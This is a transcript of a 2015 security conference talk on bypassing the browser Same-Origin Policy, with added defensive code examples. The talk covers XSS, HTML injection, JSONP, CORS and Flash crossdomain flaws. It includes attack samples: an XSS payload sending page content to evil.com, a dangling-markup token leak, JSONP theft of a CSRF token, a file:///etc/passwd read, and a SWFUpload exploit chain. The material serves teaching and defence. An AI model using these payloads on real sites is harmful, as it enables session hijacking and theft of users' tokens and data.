4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek
Transcript of 4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek
Bypassing Same-Origin Policy
Jakub Żoczek
http://twitter.com/zoczus
$ whoami
• Jakub Żoczek
• IT Systems Security Specialist
• Security Researcher
• Bug Hunter
• http://zoczus.blogspot.com
• Hall of Fame:
What is the Same-Origin Policy?
• Same domain
• Same port
• Same scheme
What is the Same-Origin Policy?
For the page http://example.com
URL                                      Comment
http://example.com/admin/index.php       Same origin
http://example.com/images/logo.png       Same origin
https://example.com/admin/panel          Different scheme
http://example.com:8080/example.html     Different port
http://admin.example.com/index.php       Different domain
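Added example (JavaScript, not from the talk): the comparison rule the table above illustrates, written out with Node's WHATWG URL parser so the three components (scheme, host, port) are checked explicitly and default ports are normalised. The helper names and the row list are choices for this example.

```javascript
// Added example: same-origin comparison for the table rows above (not code from the talk).
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Reduce a URL to the (scheme, host, port) triple the policy compares.
// A missing port means the scheme's default, so http://a.com and
// http://a.com:80 are the same origin.
function originTuple(urlString) {
  const u = new URL(urlString);
  return {
    scheme: u.protocol,
    host: u.hostname.toLowerCase(),
    port: u.port !== "" ? u.port : (DEFAULT_PORTS[u.protocol] || ""),
  };
}

// Returns null when the two URLs share an origin, otherwise the name of
// the first component that differs ("scheme", "host" or "port").
function originMismatch(pageUrl, resourceUrl) {
  const a = originTuple(pageUrl);
  const b = originTuple(resourceUrl);
  if (a.scheme !== b.scheme) return "scheme";
  if (a.host !== b.host) return "host";
  if (a.port !== b.port) return "port";
  return null;
}

// The rows of the table above, checked against http://example.com.
const PAGE = "http://example.com";
const TABLE_ROWS = [
  "http://example.com/admin/index.php",
  "http://example.com/images/logo.png",
  "https://example.com/admin/panel",
  "http://example.com:8080/example.html",
  "http://admin.example.com/index.php",
];

function classifyRows() {
  return TABLE_ROWS.map((url) => ({ url, mismatch: originMismatch(PAGE, url) }));
}

for (const row of classifyRows()) {
  console.log(row.url.padEnd(40), row.mismatch === null ? "same origin" : `different ${row.mismatch}`);
}
```

Note that http://example.com:80/ compares equal to http://example.com because the explicit default port is folded away; a naive string comparison of host:port would get that case wrong.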
What is the Same-Origin Policy?
• AJAX response
• iframe content
(document / window)
• <script> content
• <img> content
Czym jest Same-Origin Policy?
• <img src="(…)">
• <script src="(…)">
• <link href="(…)">
Cross-Site Scripting
<?php
echo '<h1> Wyniki wyszukiwania dla: ' . $_GET['search'] . '</h1>'; // reflected without escaping
// (...)
?>
Cross-Site Scripting
<html>
<body>
<!-- (...) -->
<script>
x=new XMLHttpRequest();
x.open("POST","http://evil.com/log_data", true);
x.send(btoa(document.body.innerHTML));
</script>
Cross-Site Scripting – file upload
html / htm / shtml
<html>
<body>
<script>alert('XSS');</script>
</body>
</html>
Cross-Site Scripting – file upload
xml / xsd / xsl / xhtml / rdf / svg / svgz
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
<script type="text/javascript">
alert('XSS');
</script>
</svg>
Cross-Site Scripting – file upload
swf / swfl
package {
    import flash.display.Sprite;
    import flash.external.ExternalInterface; // required for ExternalInterface.call
    public class xss extends Sprite {
        public function xss() {
            super();
            ExternalInterface.call("alert('XSS')");
            return;
        }
    }
}
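Added example (JavaScript, not from the talk): how a server should answer requests for user uploads so that the html, svg and swf payloads on the three slides above never execute in the application's origin. The extension table is the one the slides list; helper names and the inline-type table are choices for this example.

```javascript
// Added example: serving user uploads without letting them run as active content
// (not code from the talk).
// Extensions the slides show executing script when served from the app origin.
const ACTIVE_CONTENT_EXTENSIONS = new Set([
  "html", "htm", "shtml",
  "xml", "xsd", "xsl", "xhtml", "rdf", "svg", "svgz",
  "swf", "swfl",
]);

// Types that may be shown inline; everything else is forced to a download.
const INLINE_TYPES = new Map([
  ["png", "image/png"], ["jpg", "image/jpeg"], ["jpeg", "image/jpeg"],
  ["gif", "image/gif"], ["txt", "text/plain; charset=utf-8"],
]);

// Last extension of the basename, lower-cased ("a/b/C.SvGz" -> "svgz").
function extensionOf(filename) {
  const base = filename.split(/[\\/]/).pop().toLowerCase();
  const dot = base.lastIndexOf(".");
  return dot === -1 ? "" : base.slice(dot + 1);
}

function isActiveContent(filename) {
  return ACTIVE_CONTENT_EXTENSIONS.has(extensionOf(filename));
}

// Filename for Content-Disposition: basename only, restricted character set.
function safeFilename(filename) {
  const base = filename.split(/[\\/]/).pop();
  return base.replace(/[^A-Za-z0-9._-]/g, "_").slice(0, 64) || "download";
}

// Response headers for GET /uploads/<filename> served from the app origin.
function uploadResponseHeaders(filename) {
  const ext = extensionOf(filename);
  // Never let the browser second-guess the declared type (stops sniffing an
  // "image" that is really markup into a document).
  const headers = { "X-Content-Type-Options": "nosniff" };
  if (INLINE_TYPES.has(ext)) {
    headers["Content-Type"] = INLINE_TYPES.get(ext);
    headers["Content-Disposition"] = "inline";
  } else {
    // Anything that could carry markup or script becomes a download, typed as
    // opaque bytes, and is sandboxed in case a client ignores the disposition.
    headers["Content-Type"] = "application/octet-stream";
    headers["Content-Disposition"] = `attachment; filename="${safeFilename(filename)}"`;
    headers["Content-Security-Policy"] = "sandbox";
  }
  return headers;
}
```

These headers are the fallback for the case where uploads must stay on the main origin; the stronger design is to serve them from a separate, cookieless domain, which takes the uploads outside the application's origin entirely.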
HTML Injection
<?php
header("Content-Security-Policy: script-src 'self'; object-src 'self'; style-src 'self'");
header("Content-type: text/html; charset=utf-8");
$str = $_GET['str']; // reconstructed: the unescaped ?str= parameter seen in the access log below
$token = "2b9ee1db6d3989f5eec70e59ab211619";
echo "<br>XSS-free Content Here " . $str;
echo "<br>Your token: " . $token;
echo "<script>var x = 'test';</script>";
echo "</body></html>";
?>
HTML Injection
root@ropchain:/var/log/apache2# cat access.log| grep token
213.17.226.11 - - [15/Apr/2015:16:51:57 +0200] "GET /%3Cbr%3EYour%20token:%202b9ee1db6d3989f5eec70e59ab211619%3Cscript%3Evar%20x%20= HTTP/1.0" 404 553 "http://lab.ropchain.org/tmp/u.php?str=%3Cimg%20src=%27http://ropchain.org/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
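Added example (JavaScript, not from the talk): detection logic for the pattern in the log above, run over constructed log lines in Apache combined format. The first sample line reproduces the request the slide shows; the second is a benign request for contrast. Function names are choices for this example.

```javascript
// Added example: spotting dangling-markup exfiltration in an access log
// (not code from the talk). Sample lines are constructed.
const SAMPLE_LOG_LINES = [
  '213.17.226.11 - - [15/Apr/2015:16:51:57 +0200] "GET /%3Cbr%3EYour%20token:%202b9ee1db6d3989f5eec70e59ab211619%3Cscript%3Evar%20x%20= HTTP/1.0" 404 553 "http://lab.ropchain.org/tmp/u.php?str=%3Cimg%20src=%27http://ropchain.org/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"',
  '10.0.0.5 - - [15/Apr/2015:16:52:10 +0200] "GET /images/logo.png HTTP/1.1" 200 1234 "http://lab.ropchain.org/" "Mozilla/5.0"',
];

// Apache "combined" format: ip ident user [time] "request" status size "referer" "ua"
const COMBINED = /^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)(?: [^"]*)?" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

function parseCombinedLogLine(line) {
  const m = COMBINED.exec(line);
  if (!m) return null;
  return {
    ip: m[1], time: m[2], method: m[3], path: m[4],
    status: Number(m[5]), size: m[6], referer: m[7], userAgent: m[8],
  };
}

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Dangling markup turns page text into the URL of an image or link. The
// give-away is HTML sitting in the request path (here the token line and the
// start of an inline script), arriving with a Referer from our own site.
function flagDanglingMarkup(line) {
  const entry = parseCombinedLogLine(line);
  if (!entry) return null;
  const decoded = safeDecode(entry.path);
  if (!/<[a-z!\/]/i.test(decoded)) return null;
  return {
    ip: entry.ip,
    referer: entry.referer,
    leaked: decoded.slice(0, 64), // enough to see what page content was captured
  };
}

function scanLog(lines) {
  return lines.map(flagDanglingMarkup).filter((f) => f !== null);
}

for (const finding of scanLog(SAMPLE_LOG_LINES)) {
  console.log(`${finding.ip} leaked "${finding.leaked}" via ${finding.referer}`);
}
```

The CSP on the previous slide restricts only script-src, object-src and style-src, so the injected <img src='http://ropchain.org/ is still allowed to load; a default-src 'self' (or img-src 'self') directive would have blocked the exfiltration, and passing $str through htmlspecialchars() removes the injection itself.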
JSON
http://hostname/whoami
{
"logged_in":true,
"login":"victim",
"csrf":"46aa3b5901c2b41c90ad5de62ee1b2ba"
}
JSON
http://evil.com
<script src="http://hostname/whoami"></script>
JSONP
http://hostname/whoami?callback=xx
xx({
"logged_in":true,
"login":"victim",
"csrf":"46aa3b5901c2b41c90ad5de62ee1b2ba"
});
JSONP
http://evil.com
<script>xx=function(x){alert(x.csrf);}</script>
<script src="http://hostname/whoami?callback=xx"></script>
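Added example (JavaScript, not from the talk): a /whoami handler written so that the plain <script src> include and the JSONP callback shown on the four slides above get nothing usable, while a same-origin XHR still receives the JSON. The request and session object shapes are assumptions for the example.

```javascript
// Added example: a session-bound JSON endpoint that refuses to be a script
// (not code from the talk).
function whoamiHandler(request, session) {
  const headers = { "X-Content-Type-Options": "nosniff" };

  // Fetch Metadata (sent by current browsers): a <script src=...> load arrives
  // with Sec-Fetch-Dest: script. Session data has no business being a script.
  if (request.headers["sec-fetch-dest"] === "script") {
    return { status: 403, headers, body: "" };
  }

  // A callback parameter is a JSONP request. Wrapping session data in
  // callback(...) hands it to any origin that can include the script.
  if (request.query.callback !== undefined) {
    return { status: 400, headers, body: JSON.stringify({ error: "JSONP not supported" }) };
  }

  headers["Content-Type"] = "application/json; charset=utf-8";
  // A quoted-key object literal is a SyntaxError when executed as a script,
  // which is what keeps this variant from leaking even to old browsers that
  // send no Fetch Metadata; arrays and JSONP responses are not protected this way.
  const body = JSON.stringify({
    logged_in: session.loggedIn,
    login: session.login,
    csrf: session.csrf,
  });
  return { status: 200, headers, body };
}

// Constructed sample inputs.
const SESSION = { loggedIn: true, login: "victim", csrf: "46aa3b5901c2b41c90ad5de62ee1b2ba" };
const xhrFromSameOrigin = { headers: { "sec-fetch-dest": "empty", "sec-fetch-site": "same-origin" }, query: {} };
const scriptInclude = { headers: { "sec-fetch-dest": "script", "sec-fetch-site": "cross-site" }, query: {} };
const jsonpAttempt = { headers: {}, query: { callback: "xx" } };

console.log(whoamiHandler(xhrFromSameOrigin, SESSION).status, whoamiHandler(scriptInclude, SESSION).status, whoamiHandler(jsonpAttempt, SESSION).status);
```

If an API genuinely needs JSONP for public data, keep it on a separate endpoint that never sees a session, so the callback wrapper can only ever carry data that is public anyway.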
Access-Control-Allow-Origin
HTTP/1.0 200 OK
Date: Thu, 16 Apr 2015 08:50:19 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: http://lab.ropchain.org
Content-Encoding: gzip
Content-Length: 1509
Content-Type: text/html; charset=utf-8
Access-Control-Allow-Origin
HTTP/1.0 200 OK
Date: Thu, 16 Apr 2015 08:50:19 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 1509
Content-Type: text/html; charset=utf-8
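Added example (JavaScript, not from the talk): reading the two responses above to classify what their Access-Control-Allow-Origin value exposes, and the server-side allowlist check that produces the restricted form. The raw responses are shortened, constructed copies of the slides; the allowlist and function names are choices for this example.

```javascript
// Added example: auditing and producing Access-Control-Allow-Origin (not code from the talk).
const RAW_RESPONSES = {
  restricted: [
    "HTTP/1.0 200 OK",
    "Access-Control-Allow-Origin: http://lab.ropchain.org",
    "Content-Type: text/html; charset=utf-8",
  ].join("\r\n"),
  open: [
    "HTTP/1.0 200 OK",
    "Access-Control-Allow-Origin: *",
    "Content-Type: text/html; charset=utf-8",
  ].join("\r\n"),
};

// Split a raw response head into its status line and a lower-cased header map.
function parseResponseHeaders(raw) {
  const [statusLine, ...rest] = raw.split(/\r?\n/);
  const headers = {};
  for (const line of rest) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { statusLine, headers };
}

// What the ACAO value means for a page on another origin.
function auditAcao(raw) {
  const { headers } = parseResponseHeaders(raw);
  const acao = headers["access-control-allow-origin"];
  if (acao === undefined) {
    return { level: "none", note: "no cross-origin read of the body" };
  }
  if (acao === "*") {
    // Browsers refuse to expose a credentialed response behind *, so what this
    // opens up is the body as seen by an anonymous request, from any origin.
    return { level: "public", note: "any origin can read the body of an uncredentialed request" };
  }
  return { level: "restricted", note: `only ${acao} can read the body` };
}

// Server side: echo the caller's Origin only if it is on an exact allowlist.
// Match the full origin string, never a substring or pattern, and never
// combine * with Access-Control-Allow-Credentials.
const ALLOWED_ORIGINS = new Set(["http://lab.ropchain.org"]);

function corsHeadersFor(requestOrigin, allowedOrigins = ALLOWED_ORIGINS) {
  const headers = { Vary: "Origin" }; // cached copies must not be reused across origins
  if (requestOrigin !== undefined && allowedOrigins.has(requestOrigin)) {
    headers["Access-Control-Allow-Origin"] = requestOrigin;
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

console.log(auditAcao(RAW_RESPONSES.restricted), auditAcao(RAW_RESPONSES.open));
```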
Safari
<iframe src=http://wp.pl/ onload="alert(frames[0].document.cookie)">
</iframe>
Safari
<script>
// Safari demo from the talk: a page reading a local file through XMLHttpRequest
var x = new XMLHttpRequest();
x.onreadystatechange = function() {
    document.body.innerText = x.response;
};
x.open("GET", "file:///etc/passwd", true);
x.send();
</script>
Flash – crossdomain.xml
http://domain.com/crossdomain.xml
<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*.domain.com" secure="false"/>
</cross-domain-policy>
Flash – crossdomain.xml
http://domain.com/crossdomain.xml
<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>
Flash – crossdomain.xml
http://domain.com/crossdomain.xml
<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*.domain.com" secure="false"/>
</cross-domain-policy>
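Added example (JavaScript, not from the talk): an auditor for the crossdomain.xml variants on the three slides above. The policies are constructed copies of the slides plus one tightened version; the parser is a small regex for this one file format rather than a general XML parser, and the severity labels are choices for this example.

```javascript
// Added example: auditing crossdomain.xml allow-access-from rules (not code from the talk).
const POLICIES = {
  subdomains: `<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*.domain.com" secure="false"/>
</cross-domain-policy>`,
  everyone: `<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>`,
  tightened: `<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="www.domain.com" secure="true"/>
</cross-domain-policy>`,
};

// Extract every <allow-access-from .../> element with its attributes.
function parseAllowAccessFrom(xml) {
  const rules = [];
  const element = /<allow-access-from\b([^>]*)>/g;
  let m;
  while ((m = element.exec(xml)) !== null) {
    const attrs = {};
    const attribute = /([\w-]+)\s*=\s*"([^"]*)"/g;
    let a;
    while ((a = attribute.exec(m[1])) !== null) attrs[a[1]] = a[2];
    rules.push({ domain: attrs.domain || "", secure: attrs.secure });
  }
  return rules;
}

// Findings from the policy owner's point of view: whose SWFs may read this
// site's responses with the visitor's cookies attached.
function auditCrossDomainPolicy(xml) {
  const findings = [];
  for (const rule of parseAllowAccessFrom(xml)) {
    if (rule.domain === "*") {
      findings.push({ severity: "high", domain: rule.domain,
        reason: "a SWF on any site can read this site's responses as the logged-in user" });
    } else if (rule.domain.startsWith("*.")) {
      findings.push({ severity: "medium", domain: rule.domain,
        reason: "every host under the wildcard is trusted, so one vulnerable SWF on any of them exposes this site" });
    }
    if (rule.secure === "false") {
      findings.push({ severity: "medium", domain: rule.domain,
        reason: "secure=\"false\" lets a SWF loaded over plain http read https responses" });
    }
  }
  return findings;
}

for (const [name, xml] of Object.entries(POLICIES)) {
  console.log(name, auditCrossDomainPolicy(xml));
}
```

The wildcard-subdomain finding is the one the PayPal case later in the talk turns on: the policy itself names no untrusted site, yet a single vulnerable SWF under the wildcard is enough.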
http://etsy.com - demo
https://www.youtube.com/watch?v=yuOiDqpxKow
Flash – Security.allowDomain("*")
SWFUpload - CVE-2013-2205 (© Szymon Gruszecki)
• Security.allowDomain("*")
• We control the upload URL
• We control the callback for the upload status response
• In the callback we receive the document content
• …
• PROFIT!
Flash – Security.allowDomain("*")
SWFUpload - CVE-2013-2205 (© Szymon Gruszecki)
private function UploadSuccess(file:FileItem, serverData:String, responseReceived:Boolean = true):void {
    // (…)
    ExternalCall.UploadSuccess(this.uploadSuccess_Callback, file.ToJavaScriptObject(), serverData, responseReceived);
    this.UploadComplete(false);
}
Flash – Security.allowDomain("*")
www.paypal.com/crossdomain.xml:
advertising.paypal.com/(...)/swfupload.swf - VULNERABLE
:-)
<?xml version="1.0"?>
<!-- (...) -->
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.paypalobjects.com" />
</cross-domain-policy>
http://paypal.com - demo
https://www.youtube.com/watch?v=-3Qgwi9rAfY
public function cleanEIString(arg1:String):String {
    return arg1.replace(new RegExp("[^A-Za-z0-9_.]", "gi"), "");
}
// (…)
if (loaderInfo.parameters.readyFunction != undefined) {
    ExternalInterface.call(
        _app.model.cleanEIString(readyFunction),
        ExternalInterface.objectID
    );
}
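Added example (JavaScript, not from the talk): the strict alternative to the cleanEIString approach above, which also covers the JSONP callback parameter from the earlier slides. Instead of stripping characters out of a caller-supplied function name, the name is validated as an identifier and then resolved only against callbacks the page registered itself. The registry design and function names are choices for this example; the one-line cleanEIString port is included only for comparison.

```javascript
// Added example: validate-and-register instead of strip for caller-supplied
// callback names (not code from the talk).
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

// Syntactic check: a dotted identifier of bounded length, nothing else.
function isValidCallbackName(name) {
  return typeof name === "string" && name.length <= 128 && CALLBACK_NAME.test(name);
}

// JavaScript port of the slide's strip approach, for comparison only.
function cleanEIString(arg) {
  return arg.replace(/[^A-Za-z0-9_.]/gi, "");
}

// Registry: the page declares which functions a SWF (or a JSONP response) may
// invoke. Anything else, however well-formed its name, resolves to null.
function createCallbackRegistry() {
  const registered = new Map();
  return {
    register(name, fn) {
      if (!isValidCallbackName(name)) throw new Error(`bad callback name: ${name}`);
      registered.set(name, fn);
    },
    // Never falls back to looking the name up on window/globalThis.
    resolve(name) {
      return isValidCallbackName(name) && registered.has(name) ? registered.get(name) : null;
    },
  };
}

// Constructed page-side usage.
const registry = createCallbackRegistry();
registry.register("onUploadReady", (objectId) => `ready:${objectId}`);

// Stripping turns "alert(1)" into "alert1": still a syntactically valid name,
// which is why a syntax check alone is not the whole fix.
console.log(cleanEIString("alert(1)"), registry.resolve(cleanEIString("alert(1)")));
```

The point of the registry is that validation answers only "is this a function name"; the registry answers "is this one of ours", and only the second question stops a caller from picking any global function that happens to exist on the page.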
http://yammer.com - demo
https://www.youtube.com/watch?v=J0f_sKpUak0
Questions?
Jakub Żoczek ([email protected])
http://zoczus.blogspot.com
http://twitter.com/